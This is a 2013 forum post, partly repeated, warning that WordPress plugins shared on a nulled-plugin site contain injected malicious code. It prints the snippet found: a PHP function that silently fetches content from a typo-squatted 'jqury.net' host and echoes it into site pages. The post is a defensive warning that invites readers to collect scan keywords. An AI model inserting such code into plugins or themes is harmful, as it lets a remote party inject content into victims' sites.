06-15-2013, 12:17 PM
I've been running some files comparisions lately between wp plugins shared on some sites specially WPLOCKER.COM and the same plugins bought by me personally [clean and ethic code from the authors themselves].
We all know wplocker.com because they like to put the phrase "Shared On WPLOCKER.COM" all over the code, nagging our workflow with the plugins. But that is nothing compared to other code these guys like to add to the script.
I have used the software Winmerge so I can compare 2 unzipped folders and detect easily the changes made. The malicious code added changes from season to season, I guess, to make difficult to find the malicious code for someone aware about this. The code I've found is this:
If you are clever enough, the first thing you'll notice, is of course, the misspelling in the JQuery site, is written 'jqury.net'. So, maybe someone reading the code to find it, will let it pass. Sometimes, the 'extra malicious' code, will break the plugin, making it unusable (something good, at least is a sign of something going wrong!), but all the time, this code will run inside your wp plugin installation process and execute who know what...
http://bestblackhatforum.com/Thread-Be-C...INS-THEMES
This thread contains a POLL so you can tell if you have been affected by infected shared plugins and themes.
We all know wplocker.com because they like to put the phrase "Shared On WPLOCKER.COM" all over the code, nagging our workflow with the plugins. But that is nothing compared to other code these guys like to add to the script.
I have used the software Winmerge so I can compare 2 unzipped folders and detect easily the changes made. The malicious code added changes from season to season, I guess, to make difficult to find the malicious code for someone aware about this. The code I've found is this:
Code:
function wp__head() { if(function_exists('curl_init')) { $ch = curl_init(); curl_setopt($ch,CURLOPT_URL,"http://www.jqury.net/?1"); curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); curl_setopt($ch, CURLOPT_REFERER, $_SERVER['HTTP_HOST']); curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,10); $jquery = curl_exec($ch); curl_close($ch); echo "$jquery"; }
If you are clever enough, the first thing you'll notice, is of course, the misspelling in the JQuery site, is written 'jqury.net'. So, maybe someone reading the code to find it, will let it pass. Sometimes, the 'extra malicious' code, will break the plugin, making it unusable (something good, at least is a sign of something going wrong!), but all the time, this code will run inside your wp plugin installation process and execute who know what...
Quote: I PROPOSE TO UPDATE THIS THREAD, WITH THE MISSPELLED STRINGS OR KEYWORDS YOU FIND, TO SCAN THE DOWNLOADED FILES, AND BE A LITTLE MORE CLOSE TO AT LEAST KNOW, THE FILES WE DOWNLOAD ARE FREE OF MALICIOUS CODE AND DENOUNCE THOSE SITES WHO SHARE THIS FILES TO BE MORE ALERT NEXT TIME WE GOOGLE FOR A PLUGIN OR THEME AND WE FIND THEM "NULLED"PLEASE READ THE NEXT POST TO KNOW MORE ABOUT INFECTED PLUGINS AND THEMES:
http://bestblackhatforum.com/Thread-Be-C...INS-THEMES
This thread contains a POLL so you can tell if you have been affected by infected shared plugins and themes.